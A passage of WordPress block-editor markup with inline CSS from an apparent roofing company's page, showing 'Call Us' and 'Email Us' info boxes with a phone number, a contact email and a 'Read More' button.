.skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0.2); }\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"blockId\":\"6a199a30-74a8-487c-b888-156f1279eaf9\"} -->\n<style type=\"text/css\"> .block-6a199a30-74a8-487c-b888-156f1279eaf9 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0.2); }\n .block-6a199a30-74a8-487c-b888-156f1279eaf9 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-6a199a30-74a8-487c-b888-156f1279eaf9 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-6a199a30-74a8-487c-b888-156f1279eaf9 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-6a199a30-74a8-487c-b888-156f1279eaf9 .skt-blocks-block-columns{\n padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-6a199a30-74a8-487c-b888-156f1279eaf9 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-6a199a30-74a8-487c-b888-156f1279eaf9 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-6a199a30-74a8-487c-b888-156f1279eaf9 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"width\":45,\"leftPadding\":0,\"leftPaddingTablet\":0,\"topPaddingMobile\":0,\"blockId\":\"5a7066fe-d425-4153-8844-d8ae7a4116af\"} -->\n<style type=\"text/css\"> .block-5a7066fe-d425-4153-8844-d8ae7a4116af .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-5a7066fe-d425-4153-8844-d8ae7a4116af .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-5a7066fe-d425-4153-8844-d8ae7a4116af .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 0px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-5a7066fe-d425-4153-8844-d8ae7a4116af .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 0px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-5a7066fe-d425-4153-8844-d8ae7a4116af .skt-blocks-block-column{\n padding-top: 0px; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-5a7066fe-d425-4153-8844-d8ae7a4116af\" style=\"width:45%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":19,\"resheadFontWeight\":\"500\",\"ressubHeadFontSize\":19,\"ressubHeadFontWeight\":\"500\",\"resheadSpace\":5,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"iconImage\":{\"id\":18,\"title\":\"call-icon\",\"filename\":\"call-icon.png\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/call-icon.png\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/call-icon/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"call-icon\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:33.000Z\",\"modified\":\"2021-05-25T13:48:33.000Z\",\"menuOrder\":0,\"mime\":\"image/png\",\"type\":\"image\",\"subtype\":\"png\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"5b5e5edc14\",\"delete\":\"ba6642c69e\",\"edit\":\"618a805067\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=18u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":593,\"filesizeHumanReadable\":\"593 B\",\"context\":\"\",\"height\":24,\"width\":23,\"orientation\":\"portrait\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/call-icon.png\",\"height\":24,\"width\":23,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":23,\"resshowPrefix\":false,\"counterId\":\"6836f24b-2686-4a49-bdc2-b859683a37cf\"} -->\n<style type=\"text/css\"> .skt-blocks-block-6836f24b-2686-4a49-bdc2-b859683a37cf .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-6836f24b-2686-4a49-bdc2-b859683a37cf .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-6836f24b-2686-4a49-bdc2-b859683a37cf .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-6836f24b-2686-4a49-bdc2-b859683a37cf .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-6836f24b-2686-4a49-bdc2-b859683a37cf .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-6836f24b-2686-4a49-bdc2-b859683a37cf .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-6836f24b-2686-4a49-bdc2-b859683a37cf .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-6836f24b-2686-4a49-bdc2-b859683a37cf.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 19px !important; }\n .skt-blocks-block-6836f24b-2686-4a49-bdc2-b859683a37cf.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 19px !important; }\n .skt-blocks-block-6836f24b-2686-4a49-bdc2-b859683a37cf .skt-blocks-ifb-image-content img {\n width: 23px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-6836f24b-2686-4a49-bdc2-b859683a37cf.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-6836f24b-2686-4a49-bdc2-b859683a37cf.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-6836f24b-2686-4a49-bdc2-b859683a37cf .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-6836f24b-2686-4a49-bdc2-b859683a37cf.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-6836f24b-2686-4a49-bdc2-b859683a37cf.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-6836f24b-2686-4a49-bdc2-b859683a37cf .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-6836f24b-2686-4a49-bdc2-b859683a37cf.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 1);padding:0;border-style:none;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-6836f24b-2686-4a49-bdc2-b859683a37cf skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:5px;margin-top:5px;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/call-icon.png\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h3 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:500;font-family:Poppins;margin-bottom:5px\">Call Us</h3></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:500;margin-bottom:10px\">(248) 393-5000&nbsp;</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"width\":55,\"leftPadding\":0,\"leftPaddingTablet\":0,\"topPaddingMobile\":15,\"blockId\":\"2019a28c-9fe4-4261-8545-472fe8f25e18\"} -->\n<style type=\"text/css\"> .block-2019a28c-9fe4-4261-8545-472fe8f25e18 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-2019a28c-9fe4-4261-8545-472fe8f25e18 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-2019a28c-9fe4-4261-8545-472fe8f25e18 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 0px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-2019a28c-9fe4-4261-8545-472fe8f25e18 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: 0px; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-2019a28c-9fe4-4261-8545-472fe8f25e18 .skt-blocks-block-column{\n padding-top: 15px; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-2019a28c-9fe4-4261-8545-472fe8f25e18\" style=\"width:55%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":19,\"resheadFontWeight\":\"600\",\"ressubHeadFontSize\":19,\"ressubHeadFontWeight\":\"500\",\"resheadSpace\":5,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"iconImage\":{\"id\":19,\"title\":\"email-icon\",\"filename\":\"email-icon.png\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/email-icon.png\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/email-icon/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"email-icon\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:34.000Z\",\"modified\":\"2021-05-25T13:48:34.000Z\",\"menuOrder\":0,\"mime\":\"image/png\",\"type\":\"image\",\"subtype\":\"png\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"322c42b944\",\"delete\":\"c562e168cc\",\"edit\":\"244b0c81a3\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=19u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":451,\"filesizeHumanReadable\":\"451 B\",\"context\":\"\",\"height\":16,\"width\":23,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/email-icon.png\",\"height\":16,\"width\":23,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":23,\"resshowPrefix\":false,\"counterId\":\"eb27f5f4-746e-46f7-8c6c-1546ed348b06\"} -->\n<style type=\"text/css\"> .skt-blocks-block-eb27f5f4-746e-46f7-8c6c-1546ed348b06 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-eb27f5f4-746e-46f7-8c6c-1546ed348b06 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-eb27f5f4-746e-46f7-8c6c-1546ed348b06 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-eb27f5f4-746e-46f7-8c6c-1546ed348b06 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-eb27f5f4-746e-46f7-8c6c-1546ed348b06 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-eb27f5f4-746e-46f7-8c6c-1546ed348b06 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-eb27f5f4-746e-46f7-8c6c-1546ed348b06 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-eb27f5f4-746e-46f7-8c6c-1546ed348b06.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 19px !important; }\n .skt-blocks-block-eb27f5f4-746e-46f7-8c6c-1546ed348b06.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 19px !important; }\n .skt-blocks-block-eb27f5f4-746e-46f7-8c6c-1546ed348b06 .skt-blocks-ifb-image-content img {\n width: 23px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-eb27f5f4-746e-46f7-8c6c-1546ed348b06.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-eb27f5f4-746e-46f7-8c6c-1546ed348b06.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-eb27f5f4-746e-46f7-8c6c-1546ed348b06 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-eb27f5f4-746e-46f7-8c6c-1546ed348b06.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-eb27f5f4-746e-46f7-8c6c-1546ed348b06.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-eb27f5f4-746e-46f7-8c6c-1546ed348b06 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-eb27f5f4-746e-46f7-8c6c-1546ed348b06.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 1);padding:0;border-style:none;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-eb27f5f4-746e-46f7-8c6c-1546ed348b06 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:5px;margin-top:5px;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/email-icon.png\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h3 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:600;font-family:Poppins;margin-bottom:5px\">Email Us</h3></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#303030;font-family:Poppins;font-weight:500;margin-bottom:10px\">admin@dunriteroof.com</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/buttons {\"buttonAlignment\":\"left\"} -->\n<div class=\"left tabletAligncenter mobileAligncenter skt-blocks-block-button skt-blocks-buttons__outer-wrap skt-blocks-buttons-stack-none\"><div class=\"skt-blocks-buttons__wrap skt-blocks-buttons-layout-wrap\"><!-- wp:skt-blocks/buttons-child {\"label\":\"Read More\",\"link\":\"https://dunriteroof.com/contact us\",\"counterId\":\"e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f\",\"vPadding\":15,\"hPadding\":35,\"vMargin\":0,\"hMargin\":0,\"borderRadius\":50,\"borderStyle\":\"none\",\"borderColor\":\"#ffffff\",\"borderHColor\":\"\",\"color\":\"#ffffff\",\"background\":\"#fe8333\",\"hColor\":\"\",\"buttonFontFamily\":\"Poppins\",\"buttonFontSize\":16,\"hbackground\":\"#0d2e63\",\"buttonFontWeight\":\"600\",\"backgroundType\":\"color\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 0px !important; margin-bottom: 0px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 0px !important; margin-right: 0px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 10px; margin-right: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 5px; margin-right: 5px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 15px; padding-bottom: 15px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 35px; padding-right: 35px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\"> .skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f.skt-blocks-button__wrapper .skt-blocks-button__link_child {\n color: #ffffff; }\n .skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover .skt-blocks-button__link_child {\n color: ; }\n .skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper{\n border-color: #ffffff; border-radius: 50px; border-style: none; border-width: 1px; box-shadow: 0px 0px undefined ; }\n .skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a{\n font-size: 16px; font-family: Poppins; font-weight: 600; line-height: undefined; opacity: 1; }\n .skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-button__wrapper:hover {\n border-color: ; }\n</style><style type=\"text/css\"> .skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n background-color: #fe8333; }\n .skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover {\n background-color: #0d2e63; }\n</style><style type=\"text/css\"> .skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-button__wrapper .skt-blocks-button__icon svg{\n fill: #3a3a3a; width: 16px; height: 16px; }\n .skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-button__wrapper:hover .skt-blocks-button__icon svg{\n fill: undefined; }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: 16px !important; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n</style><div class=\"skt-blocks-undefined skt-blocks-block-button skt-blocks-buttons__outer-wrap\"><div class=\"skt-blocks-e70ad50d-8d4b-4c2b-ad9d-d14a5babfc0f skt-blocks-button__wrapper skt-blocks-button__effect-undefined\"><div class=\"skt-blocks-buttons-repeater skt-blocks-button__wrapper\"><a class=\"skt-blocks-button__link_child\" href=\"https://dunriteroof.com/contact us\" rel=\"noopener noreferrer\" target=\"_blank\">Read More</a></div></div></div>\n<!-- /wp:skt-blocks/buttons-child --></div></div>\n<!-- /wp:skt-blocks/buttons --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"781513a3-174d-4594-86c8-5daf7f32af16\",\"topPadding\":100,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":100,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"opacity\":100,\"backgroundColor\":\"#f7f7f7\",\"backgroundType\":\"color\",\"className\":\"gb-renovation-section-2\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-2 skt-blocks-block-section-outer-wrap block-781513a3-174d-4594-86c8-5daf7f32af16 background-type-color alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-781513a3-174d-4594-86c8-5daf7f32af16 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-781513a3-174d-4594-86c8-5daf7f32af16 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-781513a3-174d-4594-86c8-5daf7f32af16 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 100px; padding-bottom: 100px; padding-left: 10px; padding-right: 10px; }\n}\n .block-781513a3-174d-4594-86c8-5daf7f32af16.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-781513a3-174d-4594-86c8-5daf7f32af16.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-781513a3-174d-4594-86c8-5daf7f32af16.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-781513a3-174d-4594-86c8-5daf7f32af16.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-781513a3-174d-4594-86c8-5daf7f32af16.background-type-video .skt-blocks-block-section {\n background-color: rgba(247, 247, 247, 1); }\n</style><style type=\"text/css\"> .block-781513a3-174d-4594-86c8-5daf7f32af16 .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-781513a3-174d-4594-86c8-5daf7f32af16 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-781513a3-174d-4594-86c8-5daf7f32af16.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-781513a3-174d-4594-86c8-5daf7f32af16 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-781513a3-174d-4594-86c8-5daf7f32af16.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-781513a3-174d-4594-86c8-5daf7f32af16 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-781513a3-174d-4594-86c8-5daf7f32af16.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-color:rgba(247, 247, 247, 1);box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" 